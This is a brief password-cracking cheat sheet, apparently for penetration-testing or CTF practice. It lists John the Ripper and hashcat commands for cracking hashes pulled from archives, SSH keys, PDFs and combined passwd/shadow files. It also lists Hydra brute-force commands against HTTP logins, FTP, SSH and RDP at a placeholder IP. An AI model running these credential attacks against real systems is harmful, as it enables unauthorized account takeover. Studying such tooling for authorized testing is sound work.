Cracking

John the Ripper

Basic use:

john --wordlist=rockyou.txt hash.txt

ZIP file

zip2john file1.zip > hash.txt

RAR file

rar2john file1.rar > hash.txt

GPG password

gpg2john file1.priv > hash.txt

Shadow file

unshadow passwd shadow > unshadowed.txt
john --wordlist=rockyou.txt --format=sha512crypt unshadowed.txt

SSH key password

ssh2john id_rsa > hash.txt

NTLM Cracking

john --wordlist=rockyou.txt hash.txt --format=NT

PDF password

pdf2john file.pdf > hash.txt

Hashcat

hashcat -m 0 7d98afcbd8a6c5b8c2dfb07bcbe29d34 /root/rockyou.txt --force

Hydra

HTTP Basic Auth

hydra -l admin -P dict/rockyou.txt 10.10.10.10 [-s 443] http[s]-get /private/

HTTP Post Form

hydra -l admin -P dict/rockyou.txt 10.10.10.10 [-s 443] http[s]-post-form "/login.php:username=admin&password=^PASS^&login=Login:F=Incorrect username or password" -V

FTP

hydra -t 1 -l admin -P dict/rockyou.txt -vV 10.10.10.10 ftp

SSH

hydra -l user -P dict/rockyou.txt ssh://10.10.10.10:22 -t 4

RDP

hydra -t 1 -V -f -l administrator -P dict/rockyou.txt rdp://10.10.10.10
